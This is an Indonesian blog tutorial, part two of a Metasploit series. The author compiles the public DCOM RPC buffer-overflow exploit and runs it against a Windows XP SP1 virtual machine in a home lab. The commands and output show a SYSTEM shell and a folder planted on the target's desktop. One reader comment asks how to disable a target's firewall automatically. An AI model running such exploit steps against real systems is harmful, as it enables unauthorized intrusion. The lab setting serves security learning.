Tutorial Metasploit (2) : Memahami Eksploitasi dan Kebutuhan Metasploit (2)

Tutorial Metasploit (2)

Memahami Eksploitasi dan Kebutuhan Metasploit (2)

Oleh : Reza Ervani (rezaervani@gmail.com)

Special Thanks to : Vivek Ramachandran – http://www.vivekramachandran.com/

Praktika Exploit + Exploit

Pada tutorial kedua ini kita akan lihat dan praktekkan secara langsung bagaimana melakukan eksploit dari vulnerability yang kita temukan di seri pertama : http://tanyarezaervani.wordpress.com/2011/08/27/tutorial-metasploit-1-memahami-eksploitasi-dan-kebutuhan-metasploit/

Perangkat yang penulis gunakan adalah Ubuntu 10.04.3 – Oracle Virtual Box (yang Menjalankan Windows XP Home Edition SP 1 sebagai komputer target). Tampak seperti dalam screenshot berikut : (Klik Gambar untuk Melihat Gambar dalam Ukuran Lebih Besar)

Lingkungan Praktikum : Ubuntu 10.04.3 Sebagai Host dan Virtual Box yang Menjalankan WinXP SP 1 Home Edition sebagai Target

Pertama, kita akan kompilasi terlebih dahulu file dcom.c yang kita bahas di Tutorial Pertama tadi :

# gcc dcom.c
dcom.c: In function ‘main’:
dcom.c:270: warning: format ‘%.8x’ expects type ‘unsigned int’, but argument 2 has type ‘long unsigned int’
dcom.c:272: warning: incompatible implicit declaration of built-in function ‘memcpy’

Kita dapat abaikan warning kompilasi tersebut.

Seperti yang dijelaskan di :  http://tanyarezaervani.wordpress.com/2011/05/10/serial-tutorial-c-1-compiling-program-c-dan-c/  – output kompilasi ini adalah file a.out.

Perintah ls pada direktori tempat kompilasi akan menunjukkan file-file seperti berikut :

a.out  dcom.c

Kedua, kita coba jalankan file a.out tersebut

./a.out

Maka akan tampak tampilan keluarannya seperti berikut :

[sourcecode language=”bash”]

rezaervani@rezaervani-laptop:~/Documents/LATIHAN_SECURITY/EXPLOIT$ ./a.out
———————————————————
– Remote DCOM RPC Buffer Overflow Exploit
– Original code by FlashSky and Benjurry
– Rewritten by HDM <hdm [at] metasploit.com>
– Usage: ./a.out <Target ID> <Target IP>
– Targets:
–          0    Windows 2000 SP0 (english)
–          1    Windows 2000 SP1 (english)
–          2    Windows 2000 SP2 (english)
–          3    Windows 2000 SP3 (english)
–          4    Windows 2000 SP4 (english)
–          5    Windows XP SP0 (english)
–          6    Windows XP SP1 (english)

[/sourcecode]

Perhatikan, dalam keluaran tersebut tampak ada bagian :

Usage: ./a.out <Target ID> <Target IP>

Karena komputer target kita menggunakan XP SP 1, maka Target ID kita isi dengan 6. Sementara IP target tampak dari gambar berikut yakni : 192.168.1.3 (Klik Gambar untuk Melihat Gambar dalam Ukuran Lebih Besar)

IP Komputer Target

Kita jalankan :

./a.out 6 192.168.1.3

Kita lihat apa yang terjadi :

rezaervani@rezaervani-laptop:~/Documents/LATIHAN_SECURITY/EXPLOIT$ ./a.out 6 192.168.1.3
———————————————————
– Remote DCOM RPC Buffer Overflow Exploit
– Original code by FlashSky and Benjurry
– Rewritten by HDM <hdm [at] metasploit.com>
– Using return address of 0x77e626ba
– Dropping to System Shell…

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Anda lihat, kita berhasil masuk ke Sistem Komputer Target. Ditandai dengan muncul C prompt di akhir keluaran perintah.

Sekarang coba kita lakukan sesuatu di komputer target, misalnya membuat folder dengan nama “INI FOLDER PENYUSUP” di Desktop Komputer target.

C:\WINDOWS\system32>cd “C:\Documents and Settings\Reza Ervani\Desktop>”

C:\Documents and Settings\Reza Ervani\Desktop>mkdir “INI FOLDER PENYUSUP”

Dan hasilnya di komputer target adalah tampak seperti screenshot berikut ini : (Klik Gambar untuk Melihat Gambar dalam Ukuran Lebih Besar)

Sebuah Folder Berhasil "Disusupkan" ke dalam komputer yang "Bolong"
OK, sekarang kenapa kita butuh Metasploit ?

Jika anda seorang penguji kerentanan sistem, adalah hal yang akan sangat menghabiskan waktu jika harus melakukan hal diatas sendirian. Membuat exploit sendirian, Merancang kode payload sendiri bukanlah hal yang mudah. Bayangkan jika anda harus melakukan semua hal diatas sendiri dari scratch ? Bukan hanya untuk satu vulnerability, tapi mungkin untuk banyak “titik lemah” dalam satu atau banyak sistem.

Itulah mengapa kemudian kita membutuhkan sebuah FRAMEWORK untuk memudahkan kerja tersebut. Maka Metasploit Framework kita pilih sebagai salah satu pilihan terbaik untuk menganalisa vulnerability sebuah sistem.

Detail tentang apa saja yang terkandung dalam framework Metasploit, insya Allah akan dibahas pada tutorial berikutnya. Termasuk akan kita tunjukkan bagaimana hal yang sama seperti demo diatas bisa kita lakukan juga dengan memanfaatkan Metasploit.

Semoga bermanfaat.

Bersambung (rezaervani@gmail.com)

Tutorial Sebelumnya :

3 Comments

  1. kalau misalnya firewall aktif bagaimana untuk mendisable secara otomatisnya? karena pada saat firewall aktif perintah exploit tdk akan bs d gunakan karena d blok oleh firewall

1 Trackback / Pingback

  1. Tutorial Metasploit (3) : Memahami Eksploitasi dan Kebutuhan Metasploit (3) « Tanya Reza Ervani Tentang LINUX

Leave a Reply to Rahadian Koesdijarto Putra Cancel reply

Your email address will not be published.


*